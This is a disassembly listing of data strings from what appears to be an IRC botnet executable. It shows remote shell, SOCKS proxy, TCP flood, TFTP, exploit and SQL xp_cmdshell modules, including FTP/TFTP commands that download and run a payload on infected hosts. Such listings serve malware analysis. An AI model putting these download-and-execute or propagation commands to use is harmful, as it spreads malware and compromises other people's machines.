; DATA XREF: sub_40E9C5+2E8�o
; sub_40ECEC+2DA�o
align 4
aSecureNetworkS db '[SECURE]: Network shares deleted.',0 ; DATA XREF: sub_40E9C5+2D2�o
align 4
aSecureFailed_4 db '[SECURE]: Failed to delete ',27h,'%S',27h,' share.',0
; DATA XREF: sub_40E9C5:loc_40EC30�o
align 10h
aSecureShareS_0 db '[SECURE]: Share ',27h,'%S',27h,' deleted.',0
; DATA XREF: sub_40E9C5+264�o
align 10h
aSecureFailed_3 db '[SECURE]: Failed to delete ',27h,'%s',27h,' share.',0
; DATA XREF: sub_40E9C5:loc_40EBA0�o
align 4
aSecureShareSDe db '[SECURE]: Share ',27h,'%s',27h,' deleted.',0
; DATA XREF: sub_40E9C5+1D4�o
align 4
aSecureAdvapi32 db '[SECURE]: Advapi32.dll couldn',27h,'t be loaded.',0
; DATA XREF: sub_40E9C5:loc_40EAF8�o
; sub_40ECEC:loc_40EE1B�o
align 4
aSecureFailed_2 db '[SECURE]: Failed to open IPC$ Restriction registry key.',0
; DATA XREF: sub_40E9C5:loc_40EAF1�o
aSecureRestrict db '[SECURE]: Restricted access to the IPC$ Share.',0
; DATA XREF: sub_40E9C5:loc_40EAD9�o
align 4
aSecureFailed_1 db '[SECURE]: Failed to restrict access to the IPC$ Share.',0
; DATA XREF: sub_40E9C5+10D�o
align 4
aRestrictanonym db 'restrictanonymous',0 ; DATA XREF: sub_40E9C5+EE�o
; sub_40ECEC+EE�o
align 4
aSecureFailed_0 db '[SECURE]: Failed to open DCOM registry key.',0
; DATA XREF: sub_40E9C5+92�o
; sub_40ECEC+92�o
aSecureDcomDisa db '[SECURE]: DCOM disabled.',0 ; DATA XREF: sub_40E9C5:loc_40EA39�o
align 10h
aSecureDisableD db '[SECURE]: Disable DCOM failed.',0 ; DATA XREF: sub_40E9C5+6D�o
align 10h
aEnabledcom db 'EnableDCOM',0 ; DATA XREF: sub_40E9C5+55�o
; sub_40ECEC+55�o
align 4
aSecureNetwor_0 db '[SECURE]: Network shares added.',0 ; DATA XREF: sub_40ECEC+2C2�o
aC_0 db '%c:\',0 ; DATA XREF: sub_40ECEC+22C�o
align 4
aC_1 db '%c$',0 ; DATA XREF: sub_40ECEC+21B�o
aSecureFailed_7 db '[SECURE]: Failed to add ',27h,'%s',27h,' share.',0
; DATA XREF: sub_40ECEC:loc_40EE9A�o
; sub_40ECEC:loc_40EF61�o
aSecureShareSAd db '[SECURE]: Share ',27h,'%s',27h,' added.',0 ; DATA XREF: sub_40ECEC+1A7�o
; sub_40ECEC+26E�o
aSecureFailed_6 db '[SECURE]: Failed to open IPC$ restriction registry key.',0
; DATA XREF: sub_40ECEC:loc_40EE14�o
aSecureUnrestri db '[SECURE]: Unrestricted access to the IPC$ Share.',0
; DATA XREF: sub_40ECEC:loc_40EDFC�o
align 4
aSecureFailed_5 db '[SECURE]: Failed to unrestrict access to the IPC$ Share.',0
; DATA XREF: sub_40ECEC+109�o
align 10h
aSecureDcomEnab db '[SECURE]: DCOM enabled.',0 ; DATA XREF: sub_40ECEC:loc_40ED60�o
aSecureEnableDc db '[SECURE]: Enable DCOM failed.',0 ; DATA XREF: sub_40ECEC+6D�o
align 4
aRlogindFaile_2 db '[RLOGIND]: Failed to execute shell, error: <%d>.',0
; DATA XREF: sub_40F07B+B7�o
align 4
aCmdQ db 'cmd /q',0 ; DATA XREF: sub_40F07B+80�o
align 4
aRlogindSession db '[RLOGIND]: SessionReadShellThread exited, error: <%ld>.',0
; DATA XREF: sub_40F147+89�o
aRlogindFaile_5 db '[RLOGIND]: Failed to execute shell.',0 ; DATA XREF: sub_40F2F9+B2�o
aRlogindFaile_4 db '[RLOGIND]: Failed to create shell stdin pipe, error: <%d>.',0
; DATA XREF: sub_40F2F9+82�o
align 4
aRlogindFaile_3 db '[RLOGIND]: Failed to create shell stdout pipe, error: <%d>.',0
; DATA XREF: sub_40F2F9+5F�o
aRlogindWaitfor db '[RLOGIND]: WaitForMultipleObjects error: <%d>.',0
; DATA XREF: sub_40F3F5+E2�o
align 4
aRlogindFaile_6 db '[RLOGIND]: Failed to create ReadShell session thread, error: <%d>'
; DATA XREF: sub_40F3F5+59�o
; sub_40F3F5+8F�o
db '.',0
align 4
aSocks4ErrorF_0 db '[SOCKS4]: Error: Failed to connect to target, returned: <%d>.',0
; DATA XREF: sub_40F8FA+1A7�o
align 4
aSocks4ErrorFai db '[SOCKS4]: Error: Failed to open socket(), returned: <%d>.',0
; DATA XREF: sub_40F8FA+187�o
align 4
aSocks4Authenti db '[SOCKS4]: Authentication failed. Remote userid: %s != %s.',0
; DATA XREF: sub_40F8FA+F6�o
align 4
aSocks4Failed_1 db '[SOCKS4]: Failed to start server on Port %d.',0
; DATA XREF: sub_40FB2A+1A1�o
align 4
aSocks4Failed_0 db '[SOCKS4]: Failed to start client thread, error: <%d>.',0
; DATA XREF: sub_40FB2A+16C�o
align 4
aSocks4ClientCo db '[SOCKS4]: Client connection from IP: %s:%d, Server thread: %d.',0
; DATA XREF: sub_40FB2A+107�o
align 4
aDdDhDm db '%dd %dh %dm',0 ; DATA XREF: sub_40FD16+39�o
aSysinfoCpuI64u db '[SYSINFO]: [CPU]: %I64uMHz. [RAM]: %sKB total, %sKB free. [Disk]:'
; DATA XREF: sub_40FE1F+247�o
db ' %s total, %s free. [OS]: Windows %s (%d.%d, Build %d). [Sysdir]:'
db ' %s. [Hostname]: %s (%s). [Current User]: %s. [Date]: %s. [Time]:'
db ' %s. [Uptime]: %s.',0
align 10h
aDdMmmYyyy db 'dd:MMM:yyyy',0 ; DATA XREF: sub_40FE1F+161�o
aCouldnTResolve db 'couldn',27h,'t resolve host',0 ; DATA XREF: sub_40FE1F:loc_40FF52�o
align 4
aSS_4 db '%s (%s)',0 ; DATA XREF: sub_40FE1F+C0�o
aNetinfoTypeSS_ db '[NETINFO]: [Type]: %s (%s). [IP Address]: %s. [Hostname]: %s.',0
; DATA XREF: sub_410086+99�o
align 4
off_4271AC dd offset loc_412F4D+1 ; DATA XREF: sub_410086+67�o
dword_4271B0 dd 4E414Ch dword_4271B4 dd 6C616944h, 70752Dhdword_4271BC dd 20746F4Eh, 6E6E6F63h, 65746365h, 64h, 0aTcpErrorSendin db '[TCP]: Error sending packets to IP: %s. Packets sent: %d. Returne'
; DATA XREF: sub_41046C+58F�o
db 'd: <%d>.',0
align 10h
aTcpDoneWithSFl db '[TCP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/se'
; DATA XREF: sub_41046C+522�o
db 'c (%dMB).',0
align 4
aTcpInvalidTarg db '[TCP]: Invalid target IP.',0 ; DATA XREF: sub_41046C+124�o
align 4
aTcpErrorSetsoc db '[TCP]: Error: setsockopt() failed, returned: <%d>.',0
; DATA XREF: sub_41046C+F0�o
align 4
aTcpErrorSocket db '[TCP]: Error: socket() failed, returned: <%d>.',0
; DATA XREF: sub_41046C+75�o
align 4
dword_4272EC dd 4000500h, 7868746Bh, 0aTftpFileTran_0 db '[TFTP]: File transfer complete to IP: %s (%s).',0
; DATA XREF: sub_410A22+44C�o
align 4
aTftpFileNotFou db '[TFTP]: File not found: %s (%s).',0 ; DATA XREF: sub_410A22+395�o
align 4
dword_42734C dd 1000500h, 656C6946h, 746F4E20h, 756F4620h, 646Eh
; DATA XREF: sub_410A22+379�o
aTftpFileTransf db '[TFTP]: File transfer started to IP: %s (%s).',0
; DATA XREF: sub_410A22+324�o
align 10h
aTftpFailedToOp db '[TFTP]: Failed to open file: %s.',0 ; DATA XREF: sub_410A22+14D�o
align 4
aTftpErrorSocke db '[TFTP]: Error: socket() failed, returned: <%d>.',0
; DATA XREF: sub_410A22+6C�o
aOctet db 'octet',0 ; DATA XREF: sub_410A22+11�o
align 4
aThreadList db '-[Thread List]-',0 ; DATA XREF: sub_410F55+10�o
aSNoSThreadFoun db '%s: No %s thread found.',0 ; DATA XREF: sub_411120+51�o
aSSStopped_DThr db '%s: %s stopped. (%d thread(s) stopped.)',0 ; DATA XREF: sub_411120+35�o
aSExploitingIpS db '[%s]: Exploiting IP: %s.',0 ; DATA XREF: sub_411235+2B8�o
; .text:004119D3�o ...
align 4
aHostSContentTy db 'Host: %s',0Dh,0Ah ; DATA XREF: sub_411235+1BA�o
db 'Content-Type: text/xml',0Dh,0Ah
db 'Content-Length: %d',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aHttp1_1 db ' HTTP/1.1',0Dh,0Ah,0 ; DATA XREF: sub_411235+183�o
aSearch db 'SEARCH /',0 ; DATA XREF: sub_411235+CC�o
align 10h
aEchoOpenSDOEch db 'echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &'
; DATA XREF: .text:0041193D�o
db 'echo quit >> o &ftp -n -s:o &bling.exe',0Dh,0Ah,0
align 4
aTftpISGetS db 'tftp -i %s get %s',0Dh,0Ah,0 ; DATA XREF: .text:00411913�o
aNilsisgay db 'NILSISGAY!!',0 ; DATA XREF: .text:004117E4�o
; ---------------------------------------------------------------------------
loc_42753C: ; DATA XREF: .text:004117D1�o
jmp short loc_42754D
; ---------------------------------------------------------------------------
align 10h
dword_427540 dd 2016280h, 100BDh, 8F160001h db 82h
; ---------------------------------------------------------------------------
loc_42754D: ; CODE XREF: .rdata:loc_42753C�j
add [eax], eax
; ---------------------------------------------------------------------------
db 0
dd 2 dup(0)
aEchoOpenSDOE_0 db 'echo open %s %d>o&echo USER a>>o&echo a>>o&echo binary>>o&echo ge'
; DATA XREF: sub_411A2E+8E�o
; .text:004126E7�o
db 't resource32w.exe>>o&echo quit>>o&ftp -n -s:o&del o&resource32w.e'
db 'xe',0Dh,0Ah,0
align 10h
aSIpc db '\\%s\ipc$',0 ; DATA XREF: sub_411B71+27�o
; .text:004121AD�o
align 4
dword_4275EC dd 1CEC8166h ; .text:00412159�r
dword_4275F0 dd 0E4FF07h ; .text:00412163�r
aSTryingToXploi db '[%s]: Trying to Xploit IP: %s.',0 ; DATA XREF: .text:0041275E�o
align 4
aSExploitingI_0 db '[%s]: Exploiting IP: (%s:%d) User: (%s/%s).',0
; DATA XREF: .text:004129CF�o
aTftpFileTran_1 db '[TFTP]: File transfer complete to IP: %s',0 ; DATA XREF: .text:00412956�o
align 4
aExecMaster___0 db 'EXEC master..xp_cmdshell ',27h,'%s',27h,0 ; DATA XREF: .text:00412941�o
align 4
; aExecMaster(long long, *)
aExecMaster__xp db 'EXEC master..xp_cmdshell ',27h,'tftp -i %s GET %s',27h,0
; DATA XREF: .text:0041290A�o
align 4
aDriverSqlServe db 'DRIVER={SQL Server};SERVER=%s,%d;UID=%s;PWD=%s;%s',0
; DATA XREF: .text:0041287F�o
align 10h
stru_4276F0 _msEH <0FFFFFFFFh, 0, offset sub_412FD9> ; DATA XREF: sub_412F93+2�o
align 10h
stru_427700 _msEH <0FFFFFFFFh, 0, offset sub_413037> ; DATA XREF: sub_412FE4+2�o
align 10h
stru_427710 _msEH <0FFFFFFFFh, 0, offset sub_413180> ; DATA XREF: sub_41313E+2�o
align 10h
stru_427720 _msEH <0FFFFFFFFh, 0, offset sub_4132EA> ; DATA XREF: sub_41318A+2�o
align 10h
stru_427730 _msEH <0FFFFFFFFh, 0, offset sub_413389> ; DATA XREF: sub_413337+2�o
align 10h
stru_427740 _msEH <0FFFFFFFFh, 0, offset sub_413415> ; DATA XREF: sub_4133A6+2�o
align 10h
stru_427750 _msEH <0FFFFFFFFh, 0, offset sub_4141A3> ; DATA XREF: sub_41414F+2�o
align 10h
stru_427760 _msEH <0FFFFFFFFh, 0, offset sub_414370> ; DATA XREF: sub_4142F5+2�o
aCorexitprocess db 'CorExitProcess',0 ; DATA XREF: sub_4143B9+F�o
align 4
aMscoree_dll db 'mscoree.dll',0 ; DATA XREF: sub_4143B9�o
align 10h
oword_427790 xmmword 3FF00000000000003FF0000000000000h ; DATA XREF: sub_414670+E3�r
oword_4277A0 xmmword 4330000000000000433h ; DATA XREF: sub_414670+46�r
oword_4277B0 xmmword 4330000000000000BFF0000000000000h ; DATA XREF: sub_414670+10E�r
oword_4277C0 xmmword 80000000000000008000000000000000h
; DATA XREF: sub_414670:loc_41476D�r
; sub_414670+106�r
oword_4277D0 xmmword 7FFh ; DATA XREF: sub_414670+5F�r
stru_4277E0 _msEH <0FFFFFFFFh, 0, offset sub_4148D7> ; DATA XREF: sub_414898+2�o
; sub_414CA3+53�r
align 10h
stru_4277F0 _msEH <0FFFFFFFFh, offset loc_414AC2, offset loc_414AD6>
; DATA XREF: .text:0041492C�o
align 10h
byte_427800 db 6 ; DATA XREF: sub_414CA3:loc_414D04�r
db 2 dup(0), 6
dd 100h, 6030010h, 10020600h, 45454504h, 5050505h, 303505h
dd 50h, 38282000h, 8075850h, 30303700h, 75057h, 8202000h
dd 0
dd 60686008h, 606060h, 78707000h, 8787878h, 807h, 8080007h
dd 8000008h, 7000800h, 8
aNull: ; DATA XREF: .data:off_42C74C�o
unicode 0, <(null)>,0
align 4
aNull_1 db '(null)',0 ; DATA XREF: .data:off_42C748�o
align 8
stru_427878 _msEH <0FFFFFFFFh, offset loc_415A21, offset loc_415A25>
; DATA XREF: sub_41554C+5�o
align 8
aHH:
unicode 0, < h(((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(1810181h), 0Ah dup(1010101h), 3 dup(100010h)
dd 3 dup(1820182h), 0Ah dup(1020102h), 2 dup(100010h)
dd 20h, 4030201h, 8070605h, 0C0B0A09h, 100F0E0Dh, 14131211h
dd 18171615h, 1C1B1A19h, 201F1E1Dh, 24232221h, 28272625h
dd 2C2B2A29h, 302F2E2Dh, 34333231h, 38373635h, 3C3B3A39h
dd 403F3E3Dh, 44434241h, 48474645h, 4C4B4A49h, 504F4E4Dh
dd 54535251h, 58575655h, 5C5B5A59h, 605F5E5Dh, 64636261h
dd 68676665h, 6C6B6A69h, 706F6E6Dh, 74737271h, 78777675h
dd 7C7B7A79h, 7F7E7Dh
stru_427A08 _msEH <0FFFFFFFFh, 0, offset sub_4162C0> ; DATA XREF: sub_41628E+2�o
align 8
stru_427A18 _msEH <0FFFFFFFFh, 0, offset sub_4163FB> ; DATA XREF: sub_416387+2�o
align 8
stru_427A28 _msEH <0FFFFFFFFh, 0, offset sub_4165A4> ; DATA XREF: sub_4164D8+2�o
dd 2 dup(0)
dd offset sub_416573
stru_427A40 _msEH <0FFFFFFFFh, 0, offset sub_417787> ; DATA XREF: sub_417703+2�o
align 10h
stru_427A50 _msEH <0FFFFFFFFh, 0, offset sub_417E0B> ; DATA XREF: sub_417CF5+2�o
align 10h
dbl_427A60 dq 0.0 ; DATA XREF: sub_417E9E+6�r
; sub_41D14B+8D�r ...
dword_427A68 dd 30302B65h, 30hdbl_427A70 dq 1.0 ; DATA XREF: sub_41823C+2A�r
; sub_419AF8+6D�r
dbl_427A78 dq 4.195835e6 ; DATA XREF: sub_41823C+F�r
dbl_427A80 dq 3.145727e6 ; DATA XREF: sub_41823C+6�r
aIsprocessorfea db 'IsProcessorFeaturePresent',0 ; DATA XREF: sub_41827C+F�o
align 4
aKernel32 db 'KERNEL32',0 ; DATA XREF: sub_41827C�o
align 10h
db 2 dup(0)
word_427AB2 dw 20h ; DATA XREF: sub_41D854+18�r
; .data:0042C7B0�o ...
unicode 0, < ((((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(810081h), 0Ah dup(10001h), 3 dup(100010h), 3 dup(820082h)
dd 0Ah dup(20002h), 2 dup(100010h), 20h, 41h dup(0)
dword_427CB8 dd 200000h, 4 dup(200020h), 280068h, 280028h, 200028h
; DATA XREF: .data:0042CE34�o
dd 8 dup(200020h), 480020h, 7 dup(100010h), 840010h, 4 dup(840084h)
dd 100084h, 3 dup(100010h), 3 dup(1810181h), 0Ah dup(1010101h)
dd 3 dup(100010h), 3 dup(1820182h), 0Ah dup(1020102h)
dd 2 dup(100010h), 10h dup(200020h), 480020h, 8 dup(100010h)
dd 140010h, 100014h, 2 dup(100010h), 100014h, 2 dup(100010h)
dd 1010010h, 0Bh dup(1010101h), 1010010h, 3 dup(1010101h)
dd 0Ch dup(1020102h), 1020010h, 3 dup(1020102h), 1010102h
dd 0
stru_427EC0 _msEH <0FFFFFFFFh, offset sub_4182C2, offset loc_4182C6>
; DATA XREF: sub_4182D6-2F�o
dword_427ECC dd 0 ; sub_41AF01+1E�o
stru_427ED0 _msEH <0FFFFFFFFh, offset loc_4185DD, offset loc_4185E1>
; DATA XREF: sub_4182E4+2�o
dd 0FFFFFFFFh, 4183DAh, 4183DEh, 0FFFFFFFFh, 4184A8h, 4184ACh
dd 0
stru_427EF8 _msEH <0FFFFFFFFh, 0, offset sub_4187BA> ; DATA XREF: sub_41870D+2�o
align 8
dd offset loc_418780
dd offset loc_418789
stru_427F10 _msEH <0FFFFFFFFh, offset sub_41880F, offset loc_418818>
; DATA XREF: sub_4187DB+2�o
align 10h
stru_427F20 _msEH <0FFFFFFFFh, 0, offset sub_41897A> ; DATA XREF: sub_41883D+2�o
align 10h
retn 4188h
; ---------------------------------------------------------------------------
align 4
dd offset loc_418905
stru_427F38 _msEH <0FFFFFFFFh, offset sub_418B54, offset loc_418B58>
; DATA XREF: sub_4189E4+2�o
align 8
stru_427F48 _msEH <0FFFFFFFFh, offset loc_418F30, offset loc_418F34>
; DATA XREF: sub_418F0B+2�o
align 8
stru_427F58 _msEH <0FFFFFFFFh, offset loc_418F5D, offset loc_418F61>
; DATA XREF: sub_418F40+2�o
align 8
stru_427F68 _msEH <0FFFFFFFFh, 0, offset sub_4192BB> ; DATA XREF: sub_419258+2�o
align 8
stru_427F78 _msEH <0FFFFFFFFh, 0, offset sub_4195A4> ; DATA XREF: sub_41945D+2�o
align 8
stru_427F88 _msEH <0FFFFFFFFh, 0, offset sub_419738> ; DATA XREF: sub_419706+2�o
align 8
stru_427F98 _msEH <0FFFFFFFFh, offset loc_41977D, offset loc_419781>
; DATA XREF: sub_419750+2�o
align 8
stru_427FA8 _msEH <0FFFFFFFFh, offset loc_4197C1, offset loc_4197C5>
; DATA XREF: sub_419794+2�o
dd 2 dup(0)
dd 7FF00000h, 0
dd 0FFF00000h, 0
dd 7FE00000h, 0
dd 200000h, 3 dup(0)
dd 80000000h, 7F800000h, 0FF800000h, 7FC00000h, 0FFC00000h
dd 0
dd 80000000h, 7149F2CAh, 0F149F2CAh, 0DA24260h, 8DA24260h
dd 0C2F8F359h, 1A56E1Fh, 0C2F8F359h, 81A56E1Fh
aAtan db 'atan',0 ; DATA XREF: sub_4197D8:loc_419A15�o
align 4
aCeil db 'ceil',0 ; DATA XREF: sub_4197D8:loc_419A0C�o
align 10h
aFloor db 'floor',0 ; DATA XREF: sub_4197D8:loc_419A03�o
align 4
aModf db 'modf',0 ; DATA XREF: sub_4197D8+213�o
align 10h
aExp2 db 'exp2',0 ; DATA XREF: sub_4197D8:loc_41998D�o
align 4
aExp10 db 'exp10',0 ; DATA XREF: sub_4197D8+1A5�o
align 10h
aLog2 db 'log2',0 ; DATA XREF: sub_4197D8:loc_41995A�o
; sub_4197D8+195�o
align 4
aPow db 'pow',0 ; DATA XREF: sub_4197D8:loc_419885�o
; sub_4197D8+D2�o ...
aLog10 db 'log10',0 ; DATA XREF: sub_4197D8:loc_419848�o
; sub_4197D8+7F�o ...
align 4
aExp db 'exp',0 ; DATA XREF: sub_4197D8+51�o
; sub_4197D8+64�o ...
stru_428068 _msEH <0FFFFFFFFh, offset loc_419A8D, offset loc_419A91>
; DATA XREF: sub_419A6C+2�o
align 8
stru_428078 _msEH <0FFFFFFFFh, 0, offset sub_419CC1> ; DATA XREF: sub_419C3D+2�o
dd 746E7572h, 20656D69h, 6F727265h, 2072h, 534F4C54h, 72652053h
dd 0D726F72h, 0Ah, 474E4953h, 72726520h, 0A0D726Fh, 0
dd 414D4F44h, 65204E49h, 726F7272h, 0A0Dh, 32303652h, 2D0A0D38h
dd 616E7520h, 20656C62h, 69206F74h, 6974696Eh, 7A696C61h
dd 65682065h, 0A0D7061h, 0
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 4
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 4
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 4
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 4
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 4
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 4
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 4
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aThisApplicatio db 0Dh,0Ah
db 'This application has requested the Runtime to terminate it in an '
db 'unusual way.',0Ah
db 'Please contact the application',27h,'s support team for more informa'
db 'tion.',0Dh,0Ah,0
align 10h
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 4
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: .data:off_42CF54�o
db '- floating point not loaded',0Dh,0Ah,0
align 10h
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: sub_419E4A+12C�o
; sub_41C9FD+134�o
align 4
asc_4283A8 db 0Ah ; DATA XREF: sub_419E4A+110�o
; sub_41C9FD+101�o
db 0Ah,0
align 4
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: sub_419E4A+FE�o
db 0Ah
db 'Program: ',0
align 4
a___ db '...',0 ; DATA XREF: sub_419E4A+CA�o
; sub_41C9FD+D1�o
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: sub_419E4A+89�o
; sub_41C9FD+88�o
align 8
stru_4283E8 _msEH <0FFFFFFFFh, 0, offset sub_41A9E5> ; DATA XREF: sub_41A961+2�o
align 8
stru_4283F8 _msEH <0FFFFFFFFh, 0, offset sub_41ABA8> ; DATA XREF: sub_41AB01+2�o
align 8
stru_428408 _msEH <0FFFFFFFFh, offset loc_41AFDA, offset loc_41AFDE>
; DATA XREF: sub_41AF01+2�o
aDdddMmmmDdYyyy db 'dddd, MMMM dd, yyyy',0 ; DATA XREF: .data:0042D14C�o
aMmDdYy db 'MM/dd/yy',0 ; DATA XREF: .data:0042D148�o
align 4
aDecember db 'December',0 ; DATA XREF: .data:0042D13C�o
align 10h
aNovember db 'November',0 ; DATA XREF: .data:0042D138�o
align 4
aOctober db 'October',0 ; DATA XREF: .data:0042D134�o
aSeptember db 'September',0 ; DATA XREF: .data:0042D130�o
align 10h
aAugust db 'August',0 ; DATA XREF: .data:0042D12C�o
align 4
aJuly db 'July',0 ; DATA XREF: .data:0042D128�o
align 10h
aJune db 'June',0 ; DATA XREF: .data:0042D124�o
align 4
aApril db 'April',0 ; DATA XREF: .data:0042D11C�o
align 10h
aMarch db 'March',0 ; DATA XREF: .data:0042D118�o
align 4
aFebruary db 'February',0 ; DATA XREF: .data:0042D114�o
align 4
aJanuary db 'January',0 ; DATA XREF: .data:0042D110�o
aDec db 'Dec',0 ; DATA XREF: .data:0042D10C�o
aNov db 'Nov',0 ; DATA XREF: .data:0042D108�o
aOct db 'Oct',0 ; DATA XREF: .data:0042D104�o
aSep db 'Sep',0 ; DATA XREF: .data:0042D100�o
aAug db 'Aug',0 ; DATA XREF: .data:0042D0FC�o
aJul db 'Jul',0 ; DATA XREF: .data:0042D0F8�o
aJun db 'Jun',0 ; DATA XREF: .data:0042D0F4�o
aMay db 'May',0 ; DATA XREF: .data:0042D0F0�o
; .data:0042D120�o
aApr db 'Apr',0 ; DATA XREF: .data:0042D0EC�o
aMar db 'Mar',0 ; DATA XREF: .data:0042D0E8�o
aFeb db 'Feb',0 ; DATA XREF: .data:0042D0E4�o
aJan db 'Jan',0 ; DATA XREF: .data:0042D0E0�o
aSaturday db 'Saturday',0 ; DATA XREF: .data:0042D0DC�o
align 4
aFriday db 'Friday',0 ; DATA XREF: .data:0042D0D8�o
align 10h
aThursday db 'Thursday',0 ; DATA XREF: .data:0042D0D4�o
align 4
aWednesday db 'Wednesday',0 ; DATA XREF: .data:0042D0D0�o
align 4
aTuesday db 'Tuesday',0 ; DATA XREF: .data:0042D0CC�o
aMonday db 'Monday',0 ; DATA XREF: .data:0042D0C8�o
align 4
aSunday db 'Sunday',0 ; DATA XREF: .data:0042D0C4�o
align 10h
aSat db 'Sat',0 ; DATA XREF: .data:0042D0C0�o
aFri db 'Fri',0 ; DATA XREF: .data:0042D0BC�o
aThu db 'Thu',0 ; DATA XREF: .data:0042D0B8�o
aWed db 'Wed',0 ; DATA XREF: .data:0042D0B4�o
aTue db 'Tue',0 ; DATA XREF: .data:0042D0B0�o
aMon db 'Mon',0 ; DATA XREF: .data:0042D0AC�o
aSun db 'Sun',0 ; DATA XREF: .data:off_42D0A8�o
align 10h
stru_428530 _msEH <0FFFFFFFFh, 0, offset sub_41BA2B> ; DATA XREF: sub_41B98E+2�o
align 10h
stru_428540 _msEH <0FFFFFFFFh, 0, offset sub_41BADC> ; DATA XREF: sub_41665F+53ED�o
aInitializecrit db 'InitializeCriticalSectionAndSpinCount',0 ; DATA XREF: sub_41BBD8+2D�o
align 8
stru_428578 _msEH <0FFFFFFFFh, offset loc_41BC35, offset loc_41BC43>
; DATA XREF: sub_41BBD8+2�o
align 8
stru_428588 _msEH <0FFFFFFFFh, 0, offset sub_41C2D9> ; DATA XREF: sub_41C294+2�o
dword_428594 dd 676F7250h, 3A6D6172h, 20haABufferOverrun db 'A buffer overrun has been detected which has corrupted the progra'
; DATA XREF: sub_41C9FD+62�o
db 'm',27h,'s',0Ah
db 'internal state. The program cannot safely continue execution and'
db ' must',0Ah
db 'now be terminated.',0Ah,0
aBufferOverrunD db 'Buffer overrun detected!',0 ; DATA XREF: sub_41C9FD:loc_41CA5A�o
align 10h
aASecurityError db 'A security error of unknown cause has been detected which has',0Ah
; DATA XREF: sub_41C9FD+4F�o
db 'corrupted the program',27h,'s internal state. The program cannot sa'
db 'fely',0Ah
db 'continue execution and must now be terminated.',0Ah,0
align 4
aUnknownSecurit db 'Unknown security failure detected!',0 ; DATA XREF: sub_41C9FD+4A�o
align 4
stru_428738 _msEH <0FFFFFFFFh, offset loc_41CA38, offset loc_41CA3C>
; DATA XREF: sub_41C9FD+5�o
align 8
stru_428748 _msEH <0FFFFFFFFh, offset loc_41CC65, offset loc_41CC69>
; DATA XREF: sub_41CB90+2�o
align 8
stru_428758 _msEH <0FFFFFFFFh, 0, offset sub_41CE97> ; DATA XREF: sub_41CE2D+2�o
a_nextafter db '_nextafter',0
align 10h
a_logb db '_logb',0
align 4
a_yn db '_yn',0
a_y1 db '_y1',0
a_y0 db '_y0',0
aFrexp db 'frexp',0
align 4
aFmod db 'fmod',0
align 4
a_hypot db '_hypot',0
align 4
a_cabs db '_cabs',0
align 4
aLdexp db 'ldexp',0
align 4
aFabs db 'fabs',0
align 4
aTan db 'tan',0
aCos db 'cos',0
aSin db 'sin',0
aSqrt db 'sqrt',0
align 4
aAtan2 db 'atan2',0
align 10h
aAcos db 'acos',0
align 4
aAsin db 'asin',0
align 10h
aTanh db 'tanh',0
align 4
aCosh db 'cosh',0
align 10h
aSinh db 'sinh',0
align 4
aGetprocesswind db 'GetProcessWindowStation',0 ; DATA XREF: sub_41D75B+73�o
aGetuserobjecti db 'GetUserObjectInformationA',0 ; DATA XREF: sub_41D75B+62�o
align 4
aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: sub_41D75B+47�o
align 10h
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: sub_41D75B+3F�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: sub_41D75B+2E�o
aSunmontuewedth db 'SunMonTueWedThuFriSat',0
align 4
aJanfebmaraprma db 'JanFebMarAprMayJunJulAugSepOctNovDec',0
align 4
a1Qnan db '1#QNAN',0 ; DATA XREF: sub_41E0A1:loc_41E190�o
align 4
a1Inf db '1#INF',0 ; DATA XREF: sub_41E0A1+D2�o
align 4
a1Ind db '1#IND',0 ; DATA XREF: sub_41E0A1+C1�o
align 4
a1Snan db '1#SNAN',0 ; DATA XREF: sub_41E0A1+A7�o
align 10h
stru_4288C0 _msEH <0FFFFFFFFh, 0, offset sub_41E496> ; DATA XREF: sub_41E363+2�o
align 10h
dword_4288D0 dd 2 dup(0) ; sub_419750:loc_419763�o
dword_4288D8 dd 0 ; sub_419794:loc_4197A7�o
dd 0FFFFFFFFh, 41E8ACh
dword_4288E4 dd 19930520h, 1, 4288DCh, 4 dup(0) dd 2893Ch, 2 dup(0)
dd 2901Ah, 1F000h, 28B04h, 2 dup(0)
dd 29028h, 1F1C8h, 5 dup(0)
dd 7C802442h, 7C80929Ch, 7C910331h, 7C810637h, 7C80B4CFh
dd 7C80C058h, 7C9010EDh, 7C901005h, 7C80B829h, 7C91188Ah
dd 7C80A7D4h, 7C81CDDAh, 7C802367h, 7C809B47h, 7C810D87h
dd 7C801A24h, 7C814EEAh, 7C80EDD7h, 7C80E7ECh, 7C80E866h
dd 7C834EB1h, 7C8137D9h, 7C80180Eh, 7C810B8Eh, 7C810A77h
dd 7C83632Dh, 7C8361EEh, 7C81153Ch, 7C801D77h, 7C80ADA0h
dd 7C80B6A1h, 7C82F7A0h, 7C80FE82h, 7C80FF19h, 7C80B974h
